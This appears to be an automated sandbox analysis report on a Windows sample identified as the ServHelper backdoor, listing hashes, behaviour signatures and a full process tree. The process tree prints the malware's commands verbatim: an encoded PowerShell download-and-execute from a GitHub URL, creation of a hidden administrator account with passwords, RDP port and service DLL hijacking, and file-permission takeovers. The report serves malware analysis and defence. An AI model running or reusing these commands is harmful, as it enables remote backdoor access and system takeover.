Analysis
-
max time kernel
123s -
max time network
106s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
19-07-2021 07:04
Static task
static1
Behavioral task
behavioral1
Sample
c8284ad28e4f8bd853604543884a9438.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
c8284ad28e4f8bd853604543884a9438.exe
Resource
win10v20210408
General
-
Target
c8284ad28e4f8bd853604543884a9438.exe
-
Size
7.1MB
-
MD5
c8284ad28e4f8bd853604543884a9438
-
SHA1
3d48649f085710bc3a086e53e2e9fb9b435e34cc
-
SHA256
ac5df971e605c439d1851391f51ae799b24823c47aea5c0ac177f00e5d4cc1f2
-
SHA512
97e5e03b93df44b58d446c4611b4e4209e5a5b9f2fe64b8b48c716771bd1d7dab211e317a929761f19ba96f478e996fcf0d9530dd693a9493a8e90b46d019852
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1928 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 852 Pel.exe.com 1808 Pel.exe.com 1164 Pel.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1600 icacls.exe 860 icacls.exe 920 takeown.exe 916 icacls.exe 880 icacls.exe 640 icacls.exe 2020 icacls.exe 1688 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x0004000000013110-204.dat upx behavioral1/files/0x0005000000013111-205.dat upx -
Deletes itself 1 IoCs
pid Process 1112 powershell.exe -
Loads dropped DLL 5 IoCs
pid Process 2004 cmd.exe 852 Pel.exe.com 1808 Pel.exe.com 288 Process not Found 288 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1688 icacls.exe 1600 icacls.exe 860 icacls.exe 920 takeown.exe 916 icacls.exe 880 icacls.exe 640 icacls.exe 2020 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1808 set thread context of 1164 1808 Pel.exe.com 36 -
Drops file in Windows directory 21 IoCs
description ioc Process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3c00d958-f7f4-4ee4-ae2f-66bfebdedfe3 powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_591afa10-579e-4968-8f3e-3471c2682257 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89dc0a64-2829-4b25-815e-adbf29458616 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f8be2fd-1a17-4a53-8f0d-424a89d57cba powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc8dfb2e-c0dc-4301-be6c-92ab23be4304 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9436bf75-1bce-433b-92e4-505f71b881a1 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CB7X4085RLDQVKFALTFP.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e3058c7f-ccde-4285-adaa-de2885319cb8 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5fc8b834-9d9f-45b9-8c3c-cf8f51c6ab19 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39c822c1-b658-42d9-8fca-2940b4b79878 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7407b91f-6d71-42f3-817e-15a01e412d32 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4cc55fc0-405f-47cb-95b6-d179c84431af powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0d218016d7cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1692 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1792 PING.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1112 powershell.exe 1112 powershell.exe 1912 powershell.exe 1912 powershell.exe 1496 powershell.exe 1496 powershell.exe 1856 powershell.exe 1856 powershell.exe 1112 powershell.exe 1112 powershell.exe 1112 powershell.exe 1928 powershell.exe 1928 powershell.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 464 Process not Found 288 Process not Found 288 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeRestorePrivilege 880 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1980 WMIC.exe Token: SeIncreaseQuotaPrivilege 1980 WMIC.exe Token: SeAuditPrivilege 1980 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1980 WMIC.exe Token: SeIncreaseQuotaPrivilege 1980 WMIC.exe Token: SeAuditPrivilege 1980 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1444 WMIC.exe Token: SeIncreaseQuotaPrivilege 1444 WMIC.exe Token: SeAuditPrivilege 1444 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1444 WMIC.exe Token: SeIncreaseQuotaPrivilege 1444 WMIC.exe Token: SeAuditPrivilege 1444 WMIC.exe Token: SeDebugPrivilege 1928 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 484 wrote to memory of 2040 484 c8284ad28e4f8bd853604543884a9438.exe 26 PID 484 wrote to memory of 2040 484 c8284ad28e4f8bd853604543884a9438.exe 26 PID 484 wrote to memory of 2040 484 c8284ad28e4f8bd853604543884a9438.exe 26 PID 484 wrote to memory of 2040 484 c8284ad28e4f8bd853604543884a9438.exe 26 PID 2040 wrote to memory of 2004 2040 cmd.exe 28 PID 2040 wrote to memory of 2004 2040 cmd.exe 28 PID 2040 wrote to memory of 2004 2040 cmd.exe 28 PID 2040 wrote to memory of 2004 2040 cmd.exe 28 PID 2004 wrote to memory of 1988 2004 cmd.exe 29 PID 2004 wrote to memory of 1988 2004 cmd.exe 29 PID 2004 wrote to memory of 1988 2004 cmd.exe 29 PID 2004 wrote to memory of 1988 2004 cmd.exe 29 PID 2004 wrote to memory of 852 2004 cmd.exe 30 PID 2004 wrote to memory of 852 2004 cmd.exe 30 PID 2004 wrote to memory of 852 2004 cmd.exe 30 PID 2004 wrote to memory of 852 2004 cmd.exe 30 PID 2004 wrote to memory of 1792 2004 cmd.exe 31 PID 2004 wrote to memory of 1792 2004 cmd.exe 31 PID 2004 wrote to memory of 1792 2004 cmd.exe 31 PID 2004 wrote to memory of 1792 2004 cmd.exe 31 PID 852 wrote to memory of 1808 852 Pel.exe.com 32 PID 852 wrote to memory of 1808 852 Pel.exe.com 32 PID 852 wrote to memory of 1808 852 Pel.exe.com 32 PID 1808 wrote to memory of 1164 1808 Pel.exe.com 36 PID 1808 wrote to memory of 1164 1808 Pel.exe.com 36 PID 1808 wrote to memory of 1164 1808 Pel.exe.com 36 PID 1808 wrote to memory of 1164 1808 Pel.exe.com 36 PID 1808 wrote to memory of 1164 1808 Pel.exe.com 36 PID 1164 wrote to memory of 1112 1164 Pel.exe.com 37 PID 1164 wrote to memory of 1112 1164 Pel.exe.com 37 PID 1164 wrote to memory of 1112 1164 Pel.exe.com 37 PID 1112 wrote to memory of 1624 1112 powershell.exe 39 PID 1112 wrote to memory of 1624 1112 powershell.exe 39 PID 1112 wrote to memory of 1624 1112 powershell.exe 39 PID 1624 wrote to memory of 1600 1624 csc.exe 40 PID 1624 wrote to memory of 1600 1624 csc.exe 40 PID 1624 wrote to memory of 1600 1624 csc.exe 40 PID 1112 wrote to memory of 1912 1112 powershell.exe 41 PID 1112 wrote to memory of 1912 1112 powershell.exe 41 PID 1112 wrote to memory of 1912 1112 powershell.exe 41 PID 1112 wrote to memory of 1496 1112 powershell.exe 43 PID 1112 wrote to memory of 1496 1112 powershell.exe 43 PID 1112 wrote to memory of 1496 1112 powershell.exe 43 PID 1112 wrote to memory of 1856 1112 powershell.exe 45 PID 1112 wrote to memory of 1856 1112 powershell.exe 45 PID 1112 wrote to memory of 1856 1112 powershell.exe 45 PID 1112 wrote to memory of 920 1112 powershell.exe 48 PID 1112 wrote to memory of 920 1112 powershell.exe 48 PID 1112 wrote to memory of 920 1112 powershell.exe 48 PID 1112 wrote to memory of 916 1112 powershell.exe 49 PID 1112 wrote to memory of 916 1112 powershell.exe 49 PID 1112 wrote to memory of 916 1112 powershell.exe 49 PID 1112 wrote to memory of 880 1112 powershell.exe 50 PID 1112 wrote to memory of 880 1112 powershell.exe 50 PID 1112 wrote to memory of 880 1112 powershell.exe 50 PID 1112 wrote to memory of 640 1112 powershell.exe 51 PID 1112 wrote to memory of 640 1112 powershell.exe 51 PID 1112 wrote to memory of 640 1112 powershell.exe 51 PID 1112 wrote to memory of 2020 1112 powershell.exe 52 PID 1112 wrote to memory of 2020 1112 powershell.exe 52 PID 1112 wrote to memory of 2020 1112 powershell.exe 52 PID 1112 wrote to memory of 1688 1112 powershell.exe 53 PID 1112 wrote to memory of 1688 1112 powershell.exe 53 PID 1112 wrote to memory of 1688 1112 powershell.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8284ad28e4f8bd853604543884a9438.exe"C:\Users\Admin\AppData\Local\Temp\c8284ad28e4f8bd853604543884a9438.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:484 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Proseguo.aiff2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^YqtUIsXlqZsVJRcFIpXslCfCLplPOGbPHjEKUnpzORUSfakbpNLDEbHcLBoniivxCBhbjLKpZECaIbhaXMGqUUklEpZzfLkHxmdNtOkbrCDZVgNhgQAxBvAIdrSrMsUgaUXoiAhpBoX$" Sia.aiff4⤵PID:1988
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Pel.exe.comPel.exe.com l4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Pel.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Pel.exe.com l5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Pel.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Pel.exe.com6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2satl1az\2satl1az.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AB2.tmp" "c:\Users\Admin\AppData\Local\Temp\2satl1az\CSC4C9CA1379DC14C248287713237B8F080.TMP"9⤵PID:1600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:920
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:916
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:640
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2020
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1688
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1600
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:860
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵PID:1392
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
PID:1692
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵PID:1980
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵PID:1488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵PID:1724
-
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵PID:1780
-
C:\Windows\system32\net.exenet start rdpdr10⤵PID:1300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵PID:968
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵PID:952
-
C:\Windows\system32\cmd.execmd /c net start TermService9⤵PID:1868
-
C:\Windows\system32\net.exenet start TermService10⤵PID:1884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵PID:1180
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵PID:1988
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵PID:1948
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
PID:1792
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:1496
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:912
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cTE08HUi /add1⤵PID:1948
-
C:\Windows\system32\net.exenet.exe user wgautilacc cTE08HUi /add2⤵PID:640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cTE08HUi /add3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1472
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:828
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:1420
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:1928
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc cTE08HUi1⤵PID:1860
-
C:\Windows\system32\net.exenet.exe user wgautilacc cTE08HUi2⤵PID:2008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc cTE08HUi3⤵PID:1184
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1996
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:988
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:852
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:1972
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:1184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:1884
-
-